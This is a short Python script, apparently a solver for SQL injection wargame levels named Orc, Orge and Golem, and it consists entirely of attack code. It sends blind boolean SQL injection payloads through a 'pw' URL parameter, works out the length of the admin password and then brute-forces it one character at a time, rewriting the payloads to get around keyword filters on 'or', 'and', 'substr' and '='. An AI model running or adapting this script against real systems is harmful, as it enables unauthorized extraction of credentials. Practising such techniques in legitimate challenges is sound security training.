Orc, Orge, Golem

selah.py

from string import ascii_lowercase, digits
from requests import get

cookies = {"PHPSESSID": ""}

target = "문제 url"

total = list(ascii_lowercase + digits)


def fuck_filter(query: str) -> str:
    query = query.replace("or", "||")
    query = query.replace("and", "&&")
    query = query.replace("substr(", "substring(")
    query = query.replace("=", " like ")

    return query


def send_query(query: str) -> bool:
    resp = get(url=target, params={"pw": query}, cookies=cookies)

    if "Hello admin" in resp.text:
        return True

    return False


def guess_index():
    index = 1

    while True:
        query = fuck_filter(f"' or id='admin' and length(pw)={index}#")

        if send_query(query):
            print(f"Found Index: {index}")
            return index

        index += 1


def brute_attack_idx(index: int) -> str:
    for letter in total:
        query = fuck_filter(f"' or id='admin' and substr(pw,{index},1)='{letter}'#")

        if send_query(query):
            print(f"{index} => {letter}")
            return letter


def clear_for_me(password: str) -> str:
    query = fuck_filter(password)

    if send_query(query):
        return


if __name__ == "__main__":
    password = ""
    index = guess_index()
    for i in range(1, index + 1):
        password += brute_attack_idx(i)

    clear_for_me(password)